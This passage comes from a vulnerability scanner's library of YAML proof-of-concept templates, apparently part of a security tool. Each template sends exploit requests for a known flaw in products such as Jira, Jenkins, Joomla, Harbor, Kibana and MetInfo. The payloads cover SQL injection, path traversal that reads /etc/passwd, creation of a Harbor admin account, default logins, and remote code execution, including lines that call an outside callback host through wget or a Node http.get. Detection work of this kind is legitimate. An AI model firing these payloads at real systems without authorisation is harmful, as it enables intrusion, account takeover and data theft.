response.body.bcontains(bytes(md5(string(r1)))) 9 | detail: 10 | author: PickledFish(https://github.com/PickledFish) 11 | links: 12 | - https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/ 13 | -------------------------------------------------------------------------------- /pkg/pocs/glassfish-cve-2017-1000028-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-glassfish-cve-2017-1000028-lfi 2 | rules: 3 | - method: GET 4 | path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Ant-Version:") 
&& response.body.bcontains(b"Manifest-Version:") 8 | detail: 9 | version: <4.1.0 10 | author: sharecast 11 | links: 12 | - https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0 -------------------------------------------------------------------------------- /pkg/pocs/go-pprof-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-go-pprof-leak 2 | rules: 3 | - method: GET 4 | path: "/debug/pprof/" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"Types of profiles available"))) && response.body.bcontains(bytes(string(b"Profile Descriptions"))) 7 | - method: GET 8 | path: "/debug/pprof/goroutine?debug=1" 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(b"goroutine profile: total"))) 11 | detail: 12 | author: pa55w0rd(www.pa55w0rd.online/) 13 | Affected Version: "go pprof leak" 14 | links: 15 | - https://cloud.tencent.com/developer/news/312276 16 | -------------------------------------------------------------------------------- /pkg/pocs/h2-database-web-console-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-h2-database-web-console-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: /h2-console 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"Welcome to H2") 8 | search: | 9 | location.href = '(?P.+?)' 10 | - method: GET 11 | path: /h2-console/{{token}} 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"Generic H2") 14 | detail: 15 | author: jujumanman (https://github.com/jujumanman) 16 | links: 17 | - https://blog.csdn.net/zy15667076526/article/details/111413979 18 | - https://github.com/vulhub/vulhub/tree/master/h2database/h2-console-unacc 19 | -------------------------------------------------------------------------------- /pkg/pocs/hadoop-yarn-unauth.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-hadoop-yarn-unauth 2 | rules: 3 | - method: GET 4 | path: /ws/v1/cluster/info 5 | follow_redirects: true 6 | headers: 7 | Content-Type: application/json 8 | expression: | 9 | response.status == 200 && response.body.bcontains(b"resourceManagerVersionBuiltOn") && response.body.bcontains(b"hadoopVersion") 10 | detail: 11 | author: p0wd3r,sharecast 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn 14 | -------------------------------------------------------------------------------- /pkg/pocs/harbor-cve-2019-16097.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-harbor-cve-2019-16097 2 | set: 3 | r1: randomInt(5, 10) 4 | r2: randomLowercase(r1) 5 | rules: 6 | - method: GET 7 | path: / 8 | expression: response.body.bcontains(b"Harbor") 9 | - method: POST 10 | path: /api/users 11 | headers: 12 | Content-Type: application/json 13 | body: >- 14 | {"username": "{{r2}}", "has_admin_role": true, "password": "{{r2}}", 15 | "email": "{{r2}}@example.com", "realname": "{{r2}}"} 16 | follow_redirects: false 17 | expression: | 18 | response.status == 201 19 | detail: 20 | author: scanf & Soveless(https://github.com/Soveless) & cc_ci(https://github.com/cc8ci) 21 | links: 22 | - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ 23 | - https://github.com/goharbor/harbor/issues/8951 24 | - https://www.freebuf.com/vuls/214767.html -------------------------------------------------------------------------------- /pkg/pocs/hikvision-cve-2017-7921.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-hikvision-cve-2017-7921 2 | rules: 3 | - method: GET 4 | path: /system/deviceInfo?auth=YWRtaW46MTEK 5 | follow_redirects: false 6 | expression: | 7 | response.status == 
200 && response.body.bcontains(b"") && response.headers["content-type"] == "application/xml" 8 | detail: 9 | author: whwlsfb(https://github.com/whwlsfb) 10 | links: 11 | - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html 12 | -------------------------------------------------------------------------------- /pkg/pocs/ifw8-router-cve-2019-16313.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ifw8-router-cve-2019-16313 2 | rules: 3 | - method: GET 4 | path: >- 5 | /index.htm?PAGE=web 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"www.ifw8.cn") 9 | - method: GET 10 | path: >- 11 | /action/usermanager.htm 12 | follow_redirects: false 13 | expression: > 14 | response.status == 200 && "\"pwd\":\"[0-9a-z]{32}\"".bmatches(response.body) 15 | detail: 16 | author: cc_ci(https://github.com/cc8ci) 17 | Affected Version: "v4.31" 18 | links: 19 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16313 20 | - http://www.iwantacve.cn/index.php/archives/311/ 21 | - https://nvd.nist.gov/vuln/detail/CVE-2019-16312 -------------------------------------------------------------------------------- /pkg/pocs/influxdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-influxdb-unauth 2 | rules: 3 | - method: GET 4 | path: /ping 5 | follow_redirects: true 6 | expression: | 7 | response.status == 204 && "x-influxdb-version" in response.headers 8 | - method: GET 9 | path: /query?q=show%20users 10 | follow_redirects: true 11 | expression: > 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"columns") && response.body.bcontains(b"user") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://docs.influxdata.com/influxdb/v1.7/tools/api/ -------------------------------------------------------------------------------- 
/pkg/pocs/jboss-cve-2010-1871.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-cve-2010-1871 2 | set: 3 | r1: randomInt(8000000, 10000000) 4 | r2: randomInt(8000000, 10000000) 5 | rules: 6 | - method: GET 7 | path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d 8 | follow_redirects: false 9 | expression: | 10 | response.status == 302 && response.headers["location"].contains(string(r1 * r2)) 11 | detail: 12 | author: fuping 13 | links: 14 | - http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871 -------------------------------------------------------------------------------- /pkg/pocs/jboss-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jboss-unauth 2 | rules: 3 | - method: GET 4 | path: /jmx-console/ 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://xz.aliyun.com/t/6103 -------------------------------------------------------------------------------- /pkg/pocs/jenkins-cve-2018-1000600.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000600 2 | set: 3 | reverse: newReverse() 4 | reverseUrl: reverse.url 5 | rules: 6 | - method: GET 7 | path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}} 8 | expression: | 9 | response.status == 200 && reverse.wait(5) 10 | detail: 11 | author: PickledFish(https://github.com/PickledFish) 12 | links: 13 | - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ 14 | 
-------------------------------------------------------------------------------- /pkg/pocs/jenkins-cve-2018-1000861-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-cve-2018-1000861-rce 2 | set: 3 | rand: randomLowercase(4) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload; 8 | follow_redirects: false 9 | expression: >- 10 | response.status == 200 && response.body.bcontains(bytes("package#" + rand)) 11 | detail: 12 | author: p0wd3r 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 15 | -------------------------------------------------------------------------------- /pkg/pocs/jenkins-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jenkins-unauthorized-access 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 | - method: GET 7 | path: /script 8 | follow_redirects: false 9 | expression: response.status == 200 10 | search: | 11 | "Jenkins-Crumb", "(?P.+?)"\); 12 | - method: POST 13 | path: /script 14 | body: | 15 | script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C 16 | expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2))) 17 | detail: 18 | author: MrP01ntSun(https://github.com/MrPointSun) 19 | links: 20 | - https://www.cnblogs.com/yuzly/p/11255609.html 21 | - https://blog.51cto.com/13770310/2156663 22 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2019-11581.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-11581 2 | set: 3 | reverse: newReverse() 4 | reverseUrl: reverse.url 5 | rules: 6 | - method: GET 7 | path: /secure/ContactAdministrators!default.jspa 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 11 | search: name="atlassian-token" content="(?P.+?)" 12 | - method: POST 13 | path: /secure/ContactAdministrators.jspa 14 | body: >- 15 | from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%27wget+{{reverseUrl}}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={{token}}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81 16 | follow_redirects: false 17 | expression: | 18 | response.status == 302 && reverse.wait(5) 19 | detail: 20 | author: harris2015(https://github.com/harris2015) 21 | Affected Version: "cve-2019-11581" 22 | links: 23 | - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html 24 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2019-8442.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2019-8442 2 | rules: 3 | - method: GET 4 | path: "/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"com.atlassian.jira"))) && response.content_type.contains("application/xml") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "<7.13.4, 8.00-8.0.4, 8.1.0-8.1.1" 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2019-8442 12 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2019-8449.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-jira-cve-2019-8449 2 | rules: 3 | - method: GET 4 | path: /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false 5 | expression: | 6 | response.status == 200 && response.content_type.icontains("json") && response.headers["X-AREQUESTID"] != "" && response.body.bcontains(b"total") && response.body.bcontains(b"groups") && response.body.bcontains(b"header") && response.body.bcontains(b"users") 7 | detail: 8 | author: MaxSecurity(https://github.com/MaxSecurity) 9 | links: 10 | - https://xz.aliyun.com/t/7219 11 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2020-14179.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14179 2 | rules: 3 | - method: GET 4 | path: /secure/QueryComponent!Default.jspa 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"com.atlassian.jira") 8 | detail: 9 | author: harris2015(https://github.com/harris2015) 10 | links: 11 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179 12 | -------------------------------------------------------------------------------- /pkg/pocs/jira-cve-2020-14181.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-cve-2020-14181 2 | set: 3 | r: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: /secure/ViewUserHover.jspa?username={{r}} 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes("/secure/ViewProfile.jspa?name=" + r)) && response.body.bcontains(bytes("com.atlassian.jira")) 10 | detail: 11 | author: whwlsfb(https://github.com/whwlsfb) 12 | links: 13 | - https://www.tenable.com/cve/CVE-2020-14181 14 | - https://twitter.com/ptswarm/status/1318914772918767619 15 | 
-------------------------------------------------------------------------------- /pkg/pocs/jira-ssrf-cve-2019-8451.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jira-ssrf-cve-2019-8451 2 | set: 3 | originScheme: request.url.scheme 4 | originHost: request.url.host 5 | reverse: newReverse() 6 | reverseHost: reverse.url.host 7 | reverseURL: reverse.url.path 8 | rules: 9 | - method: GET 10 | path: >- 11 | /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}} 12 | headers: 13 | X-Atlassian-Token: no-check 14 | expression: | 15 | reverse.wait(5) 16 | detail: 17 | author: jingling(https://github.com/shmilylty) 18 | links: 19 | - https://jira.atlassian.com/browse/JRASERVER-69793 20 | -------------------------------------------------------------------------------- /pkg/pocs/joomla-component-vreview-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-component-vreview-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: POST 6 | path: /index.php?option=com_vreview&task=displayReply 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)# 11 | follow_redirects: true 12 | expression: | 13 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 14 | detail: 15 | author: 南方有梦(https://github.com/hackgov) 16 | Affected Version: "1.9.11" 17 | links: 18 | - https://www.exploit-db.com/exploits/46227 19 | -------------------------------------------------------------------------------- /pkg/pocs/joomla-cve-2015-7297-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2015-7297-sqli 2 | rules: 3 | - method: GET 4 | path: 
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) 5 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 6 | detail: 7 | links: 8 | - https://www.exploit-db.com/exploits/38797 9 | - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html 10 | - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ -------------------------------------------------------------------------------- /pkg/pocs/joomla-cve-2017-8917-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2017-8917-sqli 2 | rules: 3 | - method: GET 4 | path: "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" 5 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 6 | detail: 7 | links: 8 | - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917 -------------------------------------------------------------------------------- /pkg/pocs/joomla-cve-2018-7314-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-joomla-cve-2018-7314-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: 南方有梦(http://github.com/hackgov) 11 | Affected Version: "3.0.2" 12 | links: 13 | - https://www.exploit-db.com/exploits/44160 14 | -------------------------------------------------------------------------------- /pkg/pocs/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml: -------------------------------------------------------------------------------- 1 | 
name: poc-yaml-joomla-ext-zhbaidumap-cve-2018-6605-sqli 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: >- 7 | /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: >- 11 | id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{rand}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+ 12 | follow_redirects: false 13 | expression: > 14 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) && response.body.bcontains(b"dataexists") 15 | detail: 16 | author: leezp 17 | Affected Version: "zhBaidumap plugin 3.0.0.*" 18 | links: 19 | - https://www.exploit-db.com/exploits/43974 20 | - https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&mid=2247489109&idx=1&sn=0c9a3388e4ac1389897b4449fb3afNULL0&chksm=9bcea13facb928293ac06fede04f15d564b60a5e8ad26208f28ebe175017aa3d2144617f2b60&mpshare=1&scene=23&srcid=0418r0yqNrZ1hyGCdDHl8EK1#rd -------------------------------------------------------------------------------- /pkg/pocs/jupyter-notebook-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-jupyter-notebook-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: "/terminals/3" 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"terminals/websocket") && !response.body.bcontains(b"Password:") 8 | detail: 9 | author: bufsnake(https://github.com/bufsnake) 10 | links: 11 | - https://vulhub.org/#/environments/jupyter/notebook-rce/ 12 | -------------------------------------------------------------------------------- 
/pkg/pocs/kafka-manager-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kafka-manager-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Kafka Manager") && response.body.bcontains(b"Add Cluster") 8 | detail: 9 | author: Aquilao(https://github.com/Aquilao) 10 | links: 11 | - https://blog.csdn.net/qq_36923426/article/details/111361158 12 | -------------------------------------------------------------------------------- /pkg/pocs/kibana-cve-2018-17246.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-cve-2018-17246 2 | rules: 3 | - method: GET 4 | path: /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.headers["kbn-name"] == "kibana" && response.content_type.contains("application/json") && response.body.bcontains(bytes("\"statusCode\":500")) && response.body.bcontains(bytes("\"message\":\"An internal server error occurred\"")) 8 | detail: 9 | author: canc3s(https://github.com/canc3s) 10 | kibana_version: before 6.4.3 and 5.6.13 11 | links: 12 | - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 13 | - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md 14 | -------------------------------------------------------------------------------- /pkg/pocs/kibana-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kibana-unauth 2 | rules: 3 | - method: GET 4 | path: /app/kibana 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b".kibanaWelcomeView") 8 | detail: 9 | author: Isaac(https://github.com/IsaacQiang) 10 | links: 11 | - https://zhuanlan.zhihu.com/p/61215662 
-------------------------------------------------------------------------------- /pkg/pocs/kong-cve-2020-11710-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-kong-cve-2020-11710-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"kong_env") 7 | - method: GET 8 | path: /status 9 | expression: | 10 | response.status == 200 && response.body.bcontains(b"kong_db_cache_miss") 11 | detail: 12 | author: Loneyer 13 | links: 14 | - https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw 15 | -------------------------------------------------------------------------------- /pkg/pocs/lanproxy-cve-2021-3019-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-lanproxy-cve-2021-3019-lfi 2 | rules: 3 | - method: GET 4 | path: "/../conf/config.properties" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "lanproxy 0.1" 10 | links: 11 | - https://github.com/ffay/lanproxy/issues/152 12 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 13 | -------------------------------------------------------------------------------- /pkg/pocs/laravel-debug-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-debug-info-leak 2 | rules: 3 | - method: POST 4 | path: / 5 | follow_redirects: false 6 | expression: > 7 | response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || 
response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) 8 | detail: 9 | author: Dem0ns (https://github.com/dem0ns) 10 | links: 11 | - https://github.com/dem0ns/improper/tree/master/laravel/5_debug 12 | -------------------------------------------------------------------------------- /pkg/pocs/laravel-improper-webdir.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-laravel-improper-webdir 2 | rules: 3 | - method: GET 4 | path: /storage/logs/laravel.log 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) 8 | detail: 9 | author: Dem0ns (https://github.com/dem0ns) 10 | links: 11 | - https://github.com/dem0ns/improper 12 | -------------------------------------------------------------------------------- /pkg/pocs/maccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A} 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | Affected Version: "maccms8.x" 12 | author: hanxiansheng26(https://github.com/hanxiansheng26) 13 | links: 14 | - https://www.cnblogs.com/test404/p/7397755.html -------------------------------------------------------------------------------- /pkg/pocs/maccmsv10-backdoor.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-maccmsv10-backdoor 2 | rules: 3 | - method: POST 4 | path: /extend/Qcloud/Sms/Sms.php 5 | headers: 6 
| Content-Type: application/x-www-form-urlencoded 7 | body: getpwd=WorldFilledWithLove 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(b"扫描后门") && response.body.bcontains(b"反弹端口") && response.body.bcontains(b"文件管理") 11 | detail: 12 | author: FiveAourThe(https://github.com/FiveAourThe) 13 | links: 14 | - https://www.cnblogs.com/jinqi520/p/11596500.html 15 | - https://www.t00ls.net/thread-53291-1-1.html 16 | -------------------------------------------------------------------------------- /pkg/pocs/metinfo-cve-2019-16996-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-16996-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,{{r1}}*{{r2}},5,6,7%20limit%205,1%20%23 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: JingLing(https://hackfun.org/) 14 | metinfo_version: 7.0.0beta 15 | links: 16 | - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-1 -------------------------------------------------------------------------------- /pkg/pocs/metinfo-cve-2019-16997-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-16997-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /admin/?n=language&c=language_general&a=doExportPack 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: 'appno= 1 union SELECT {{r1}}*{{r2}},1&editor=cn&site=web' 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 14 | detail: 15 | author: JingLing(https://hackfun.org/) 16 | 
metinfo_version: 7.0.0beta 17 | links: 18 | - https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2 -------------------------------------------------------------------------------- /pkg/pocs/metinfo-cve-2019-17418-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-cve-2019-17418-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: >- 8 | /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+{{r1}}*{{r2}},1--+&site=admin 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: JingLing(https://hackfun.org/) 14 | metinfo_version: 7.0.0beta 15 | links: 16 | - https://github.com/evi1code/Just-for-fun/issues/2 17 | -------------------------------------------------------------------------------- /pkg/pocs/metinfo-lfi-cnvd-2018-13393.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-metinfo-lfi-cnvd-2018-13393 2 | rules: 3 | - method: GET 4 | path: /include/thumb.php?dir=http\..\admin\login\login_check.php 5 | follow_redirects: true 6 | expression: | 7 | response.body.bcontains(b"- 8 | {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} 9 | follow_redirects: false 10 | expression: | 11 | response.status == 200 && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token") && response.content_type.contains("json") 12 | detail: 13 | author: harris2015 14 | links: 15 | - https://docs.min.io/cn/ 16 | -------------------------------------------------------------------------------- /pkg/pocs/mongo-express-cve-2019-10758.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-mongo-express-cve-2019-10758 2 | set: 3 | reverse: newReverse() 4 
| reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /checkValid 8 | headers: 9 | Authorization: Basic YWRtaW46cGFzcw== 10 | body: >- 11 | document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') 12 | follow_redirects: true 13 | expression: > 14 | reverse.wait(5) 15 | detail: 16 | vulnpath: '/checkValid' 17 | author: fnmsd(https://github.com/fnmsd) 18 | description: 'Mongo Express CVE-2019-10758 Code Execution' 19 | links: 20 | - https://github.com/masahiro331/CVE-2019-10758 21 | - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html -------------------------------------------------------------------------------- /pkg/pocs/msvod-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-msvod-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: "/images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5({{r1}}))) desc --+a" 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: jinqi 11 | links: 12 | - https://github.com/jinqi520 13 | -------------------------------------------------------------------------------- /pkg/pocs/myucms-lfr.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-myucms-lfr 2 | rules: 3 | - method: GET 4 | path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 5 | expression: | 6 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 7 | detail: 8 | author: jinqi 9 | links: 10 | - https://github.com/jinqi520 11 | -------------------------------------------------------------------------------- /pkg/pocs/nagio-cve-2018-10735.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10735 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | 
